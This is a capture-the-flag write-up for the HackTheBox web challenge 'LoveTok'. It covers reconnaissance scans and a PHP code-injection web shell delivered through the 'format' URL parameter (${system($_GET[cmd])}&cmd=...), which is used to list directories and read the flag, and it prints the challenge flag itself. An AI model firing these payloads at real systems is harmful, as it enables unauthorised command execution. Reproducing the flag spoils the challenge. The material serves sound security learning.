--- title: 'HackTheBox: LoveTok' disqus: hackmd --- HackTheBox: LoveTok === ## Table of Contents [TOC] ## Topic ### Lab #### HackTheBox: https://app.hackthebox.com/challenges/198 ### Initial Enumeration ●Start Machine: http://206.189.28.180:30492/  ## Solution ### 1. Attempt #### 1.1 nmap scan > nmap -sC -sV -T4 206.189.28.180  > 這題非滲透，只開 port 30492 #### 1.2 dirsearch scan > dirsearch -u http://206.189.28.180:30492/  > /.DS_Store ●[.DS_Store用途](https://zh.wikipedia.org/zh-tw/.DS_Store) #### 1.3 Browse ##### 1.3.1 Click on the button, url changes  > http://206.189.28.180:30492/?format=r ##### 1.3.2 Edit url > http://206.189.28.180:30492/?format=chw  **(Text Changed)** > 2023-10-16T22:24:07+00:00101 ### 2. Web shell #### 2.1 system() function ●Web Shell: https://www.imperva.com/learn/application-security/web-shell/ \ ●HackTricks: [PHP Code Execution ](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass#php-code-execution) (restart machine, IP 有變更) > http://142.93.32.153:30198/?format=${system($_GET[cmd])}&cmd=ls  #### 2.2 Check download file ##### 2.2.1 idex.php 位在LoveTok\web_lovetok\challenge  ##### 2.2.2 Find Flag location \LoveTok\web_lovetok  #### 2.3 Find Flag during Web shell > TEST : http://142.93.32.153:30198/?format=${phpinfo()} > > http://142.93.32.153:30198/?format=${system($_GET[cmd])}&cmd=ls+../ (URL encode: 空白='+')  ### 3. Find Flag > http://142.93.32.153:30198/?format=${system($_GET[cmd])}&cmd=cat+../flagNBD9R  > **FLAG: HTB{wh3n_l0v3_g3ts_eval3d_sh3lls_st4rt_p0pp1ng}** ###### tags: `Web` `CTF` `Webshell`